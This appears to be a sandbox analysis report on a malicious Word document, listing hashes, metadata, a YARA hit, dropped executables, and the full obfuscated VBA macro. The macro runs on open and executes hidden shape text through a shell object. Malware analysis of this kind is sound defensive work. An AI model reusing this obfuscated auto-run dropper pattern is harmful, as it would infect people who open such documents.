8de655e6...32b8 | Files
VTI SCORE: 100/100
Dynamic Analysis Report
Classification: Dropper, Downloader

8de655e68ab3408b1101cd0e5f4c3dbe1a361cbb2a5ee10888f5ad30b95332b8 (SHA256)

cm_coupon_6185.doc

Word Document

Created at 2018-11-26 15:52:00

Notifications (1/1)

The operating system was rebooted during the analysis.

Filename: C:\Users\aETAdzjz\Desktop\cm_coupon_6185.doc
Category: Sample File
Type: Word Document
Severity: Suspicious
Mime Type application/msword
File Size 78.38 KB
MD5 f17ac0e1221e96efb1689f32e4b855e1
SHA1 325eb53851b4fb65c75c97b0ae17df24db4d714b
SHA256 8de655e68ab3408b1101cd0e5f4c3dbe1a361cbb2a5ee10888f5ad30b95332b8
SSDeep 768:pHTVucRFoqkp59YBvLdTv9ReVi4eFov5UHRFBr+1oTUHPQVGm93JOWextOy+KG:tTocn1kp59gxBK85fBr+aTmEGm9L7R
Parser Error Remark: Static analyzer was unable to completely parse the analyzed file
File Reputation Information
Severity
Suspicious
First Seen 2018-11-26 14:00 (UTC+1)
Last Seen 2018-11-26 14:00 (UTC+1)
Office Information
Revision 1
Create Time 2018-11-26 12:33:00+00:00
Modify Time 2018-11-26 12:33:00+00:00
Document Information
Codepage Latin-1
Application Microsoft Office Word
App Version 16.0
Template Normal.dotm
Document Security SecurityFlag.NONE
Page Count 1
Line Count 1
Paragraph Count 1
Word Count 2
Character Count 13
Chars With Spaces 14
Heading Pairs Title
scale_crop False
shared_doc False
VBA Macros (1)
Macro #1: NLMPGANATmYQ
Attribute VB_Name = "NLMPGANATmYQ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   On Error Resume Next
      Select Case iKTOciszh
         Case 45985471
            FPbpt = 21874628
            QBCjFSm = CLng(203469733)
         Case 184538627
            HdjuUVbj = Oct(qRbdFXPR)
            NHUJa = LIqzFBc
         Case 325598872
            HsDaI = CDate(tzIFNLoX)
            LpAfRUQzD = Int(71584852 * LfbbmNUY)
      End Select
   On Error Resume Next
      Select Case EKXzcmTM
         Case 83761720
            aiPSolG = 151004253
            aomzGXbS = CLng(249060251)
         Case 270952365
            urpBmBW = Oct(WSPYGW)
            FwWbZimvu = RKRaATiXj
         Case 237000209
            sOfmPtAV = CDate(QjdPRd)
            KPuIvuGUr = Int(33667943 * VwhAWmHM)
      End Select
   On Error Resume Next
      Select Case nMmQopiS
         Case 127838003
            jzFjfkN = 118011559
            jLwNJ = CLng(259691284)
         Case 225166846
            mAJONzd = Oct(UjjDZWQY)
            HMrcZJc = EqYrwccF
         Case 127063817
            SJKVzczKE = CDate(OhNvYlB)
            quNrhfJ = Int(45191263 * sVDGz)
      End Select
Set zOSlMPc = Shapes("ukCIsbaRsAAdFc")
   On Error Resume Next
      Select Case zHOZJ
         Case 191259502
            tpFipF = 14731536
            dVCSiXTk = CLng(168009887)
         Case 107955366
            RUkfLLl = Oct(liwhqAi)
            JUYzXuS = TNutdjXp
         Case 62684513
            LzIJuTEa = CDate(DfoMSz)
            JPAREWBEM = Int(332074737 * rBEKJX)
      End Select
   On Error Resume Next
      Select Case hhwXm
         Case 257919450
            TrUZEbE = 316507397
            fJtLmoGjo = CLng(303689462)
         Case 134936929
            PwhjYSi = Oct(kaXjqvjzZ)
            HGqjvPPQ = tbSisS
         Case 334864719
            vnsfI = CDate(CIEmNVq)
            JHFnO = Int(238468544 * ASRHzpRS)
      End Select
VwzGAmpk = "" + OzaFuwd + iActd + osdoz + zOSlMPc.TextFrame.TextRange.Text + vCMZMsWQ + UkJpvWH
   On Error Resume Next
      Select Case nZHKsnk
         Case 187485526
            YSzqZi = 125863223
            cJKFVKmj = CLng(278640972)
         Case 135345463
            kjdiaWk = Oct(GIzilS)
            bwwWoYMFY = MXRPUdC
         Case 126551216
            rjuoZU = CDate(KMccbZma)
            piTjwYaF = Int(20790940 * wSDmiz)
      End Select
   On Error Resume Next
      Select Case NbWHjPb
         Case 17938493
            CrWMj = 196554140
            ZfRmj = CLng(167685107)
         Case 178717545
            zlQGjvLh = Oct(mHtkSOPk)
            ENKLz = CdzSrRqo
         Case 5385905
            KzwVTLrKo = CDate(YkUHQBB)
            VNVlnfDG = Int(330714115 * pQwTstIRR)
      End Select
Set bfIKKuI = GetObject(sWzWXMSI + "new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + BpPHSnVYJ)
   On Error Resume Next
      Select Case FpwAJtB
         Case 214035387
            FHUXoE = 246239110
            Ornoj = CLng(327686778)
         Case 122608792
            QWKJPPnvX = Oct(KJXaNwRF)
            QLbFDqf = KSoZsdK
         Case 291525183
            qWzpTZz = CDate(tciod)
            XbYCipQGT = Int(240147753 * ddjJSfNi)
      End Select
   On Error Resume Next
      Select Case TLzDi
         Case 209993582
            VqpjFpME = 235615500
            jjupnc = CLng(206130063)
         Case 146521999
            oqnwfFuu = Oct(kbtjZCQmj)
            zDBLM = AOBMfiTh
         Case 314698920
            thsKaLvPU = CDate(XAJrY)
            wXWim = Int(202915500 * JiqshQB)
      End Select
Const aqKdDc = 0
   On Error Resume Next
      Select Case BZitbM
         Case 282266177
            WumYDFnic = 338577405
            MGcnDbm = CLng(272081948)
         Case 7126579
            jVNDpJmwo = Oct(titLiO)
            RnqGFt = CEYmaS
         Case 271032713
            pwmZZUO = CDate(AinlfdNRI)
            MUBKsdbA = Int(8653768 * kAVWYWtv)
      End Select
   On Error Resume Next
      Select Case bIdqNBO
         Case 11396923
            TfbutJi = 312875351
            GzvjvXX = CLng(179179205)
         Case 9027108
            VmHcdzzM = Oct(nYHIaD)
            VIfkY = dHuwdvN
         Case 40738771
            mAifpM = CDate(zwtzP)
            zwpUc = Int(279791305 * PwRLA)
      End Select
   On Error Resume Next
      Select Case dtcXjQ
         Case 26157511
            NpPHQ = 175622204
            jpLAvYn = CLng(168439811)
         Case 101576679
            loEKKlz = Oct(FqkiccB)
            HXcdw = rqdiJKYv
         Case 274879967
            Nzwbzq = CDate(ERdLk)
            wMiznRQzm = Int(187361467 * zNhjc)
      End Select
bfIKKuI.Run@ VwzGAmpk, aqKdDc
   On Error Resume Next
      Select Case akulsl
         Case 146773979
            lbHSvY = 66888400
            hjwrFB = CLng(187037285)
         Case 15044243
            uFwiFZWz = Oct(IilvTiw)
            DWwURS = KfQjN
         Case 53135399
            IsBzfZc = CDate(CkUTPcim)
            PvozGG = Int(105200013 * muYZInk)
      End Select
   On Error Resume Next
      Select Case ZRRkhKk
         Case 162864993
            BilCVIi = 253217804
            mnVpT = CLng(9177140)
         Case 286817386
            lcFoLCXv = Oct(oAMUGWZ)
            XTAczv = wzXUzkzP
         Case 292735914
            YHThqjNGr = CDate(iafjQw)
            whrJohZ = Int(280145282 * fCvtqk)
      End Select
   On Error Resume Next
      Select Case RAHWHHA
         Case 65253938
            jQZOPzWXv = 339259433
            GtTAQq = CLng(141708577)
         Case 284187735
            LMZpb = Oct(wZfdlr)
            hQKNj = iMwwh
         Case 299501595
            XhGGQm = CDate(zfWqj)
            wBzrRNTD = Int(78477970 * pDKUM)
      End Select
End Sub

YARA Matches
Rule Name: Document_Contains_Execution_Commands
Rule Description: Execution commands inside a document; possible dropper
Classification: -
Severity: 3/5
Filename: c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\index.dat
Category: Modified File
Type: Stream
Severity: Unknown
Mime Type application/octet-stream
File Size 48.00 KB
MD5 0d7742564c1bf905226155ddc8801d2b
SHA1 72fd26e88b22a795f79e85703fb4a6ce40a994e0
SHA256 91425e000a3385e9c11c19ed0756d6add1f6e049de221c21c9b49873ecb278da
SSDeep 48:qHv5Jyik0i5HXWyAl7UGAnwniGhAnwwoSHXl16YSYP5lPrCoNqK5B5NA+KNi3bR/:qH7EH3WyBcaUMz3P5s+XA8dRTwLDP
Filename: c:\users\aetadzjz\appdata\roaming\microsoft\windows\cookies\index.dat
Category: Modified File
Type: Stream
Severity: Unknown
Mime Type application/octet-stream
File Size 32.00 KB
MD5 b25ed5680eaebd743130ba81c6fa3e7f
SHA1 bdd244a2878fce8ddd7b97a1ae4ed6dc6f38bd17
SHA256 cd34c6d5341fa3554bf696d02934877f38e196bdef1d30720a53f923892b7779
SSDeep 12:qjUXZ4OE32Y3XckQslQKy3gTLPrOLWlrOu933ekIQ3rIQbq93ILtrOLWlrOR:qjU6AXkQwQc3rOirOwekIyrIUZrOirO
Filename: c:\users\aetadzjz\appdata\local\microsoft\windows\history\history.ie5\index.dat
Category: Modified File
Type: Stream
Severity: Unknown
Mime Type application/octet-stream
File Size 64.00 KB
MD5 aa73bb41169e256d8b7474a877e2769e
SHA1 12fd08f88e61c39c3a4fdf33ded0f2e39ab574cc
SHA256 8dab0f4e33fd26484b86817ec85078b8bfb9d2b0149463451ab0e0e4d2950b69
SSDeep 96:qvzEMiozzcwjQ2ubh9NdeigWEsw4BtygPkxF0v33kp2uDPpGueVV9KWEFBiDXtgO:YzV8TUsEsJ9yMgBfE
Filename: C:\Users\aETAdzjz\AppData\Local\Temp\bGD.exe
Category: Created File
Type: Binary
Severity: Unknown
Also Known As c:\users\aetadzjz\appdata\local\microsoft\windows\cofiretlnt.exe (Created File)
Mime Type application/x-dosexec
File Size 132.00 KB
MD5 31342e4b67aaa69e9a8a6bd6604dc668
SHA1 d4159ed9b7f143d9c686a51b16960d33565bec4a
SHA256 5f1032665271c1fdf50e36a10afca8f2413e297b73d5114a2ed3d0022008c649
SSDeep 3072:rX/2i7MRvfSlSu+oV1D2y+Gsi1iOH++jj3fVQhxbfNWb8uTmTZ98+qZMKQTvIhEX:yi7MRvfSlSu+oV1D2y+GskiOH++j4xb3
ImpHash d98de4a30bf76dd8592ade1c467f9292
PE Information
Image Base 0x400000
Entry Point 0x403700
Size Of Code 0x3000
File Type executable
Subsystem windows_gui
Machine Type i386
Compile Timestamp 1995-11-19 14:43:13+00:00
Version Information (5)
InternalName -
CompanyName -
FileVersion -
FileDescription remtsv
Sections (6)
Name Virtual Address Virtual Size Raw Data Size Raw Data Offset Flags Entropy
.text 0x401000 0x2868 0x3000 0x1000 type_dsect, cnt_code, mem_execute, mem_read 5.9
.io 0x404000 0x734 0x1000 0x4000 cnt_initialized_data, mem_read 2.5
.data 0x405000 0x2d8c 0x1000 0x5000 cnt_initialized_data, mem_read, mem_write 3.59
.crt0 0x408000 0x1801c 0x19000 0x6000 cnt_initialized_data, mem_read, mem_write 7.89
.rsrc 0x421000 0x390 0x1000 0x1f000 cnt_initialized_data, mem_read 0.8
.reloc 0x422000 0x52c 0x1000 0x20000 cnt_initialized_data, mem_discardable, mem_read 2.73
Imports (4)
KERNEL32.dll (4)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
GetSystemTime 0x0 0x404010 0x45c0 0x45c0 0x277
GetThreadPriority 0x0 0x404014 0x45c4 0x45c4 0x28e
GetCommandLineW 0x0 0x404018 0x45c8 0x45c8 0x187
GetCurrentThread 0x0 0x40401c 0x45cc 0x45cc 0x1c4
ESENT.dll (1)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
JetGetBookmark 0x0 0x404000 0x45b0 0x45b0 0x8c
USER32.dll (9)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
GetScrollPos 0x0 0x404024 0x45d4 0x45d4 0x176
IsWindowEnabled 0x0 0x404028 0x45d8 0x45d8 0x1dc
IsClipboardFormatAvailable 0x0 0x40402c 0x45dc 0x45dc 0x1ca
CountClipboardFormats 0x0 0x404030 0x45e0 0x45e0 0x56
GetShellWindow 0x0 0x404034 0x45e4 0x45e4 0x179
GetScrollRange 0x0 0x404038 0x45e8 0x45e8 0x177
SetTimer 0x0 0x40403c 0x45ec 0x45ec 0x2bb
SetMenu 0x0 0x404040 0x45f0 0x45f0 0x29c
GetFocus 0x0 0x404044 0x45f4 0x45f4 0x12c
GDI32.dll (1)
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
GetTextColor 0x0 0x404008 0x45b8 0x45b8 0x218
Function Logfile

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefox with the setting "security.fileuri.strict_origin_policy" deactivated.
